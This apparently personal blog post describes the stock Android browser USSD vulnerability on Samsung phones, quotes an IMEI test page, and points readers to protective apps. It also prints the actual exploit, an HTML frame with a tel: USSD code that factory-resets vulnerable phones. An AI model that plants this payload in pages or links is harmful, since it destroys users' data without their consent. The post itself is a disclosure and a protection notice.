Android #Fail

It appears that going to a test URL with a certain iframe using the stock Android browser can perform a factory reset on the phone.

There was a URL posted in the XDA forums pointing to http://ninpo.qap.la/test/index.html to test whether or not the browser would invoke the dialer and present the IMEI. It worked on my Samsung Infuse 4G running stock Gingerbread so I’m guessing that a real exploit may factory reset my phone. Ugh…

Note: The link above could change at anytime to the real exploit, use at your own risk. Here is the content of the test page.

<!DOCTYPE html>
<html>
<frameset>
<frame src=”tel:*%2306%23″>
</frameset>
</html>

The exploit code uses:
<frame src=”tel:*2767*3855%23″ />

Nice huh?

Reports have said it affects mainly Samsung devices but other reports have indicated an old Android bug affecting multiple devices. Should be interesting to see how this turns out…

Update: Confirmed that my Samsung Infuse 4G running Android 2.3.6 (Gingerbread) is vulnerable.

Link for exploit as well as other pertinent information: http://gizmodo.com/5946334/samsung-security-bug-can-wipe-out-your-galaxy-phone-updating

Samsung Infuse 4G Vulnerable to Exploit (YouTube)

 

1:12 – Phone Model / Version
3:56 – link clicked, dialer launched, performs format/reset
4:20 – reset
6:35 – files/folders gone

NoTelURL app to install to prompt user on action to take.

Another app ESET USSD – https://play.google.com/store/apps/details?id=com.eset.securedialer will protect you from this exploit.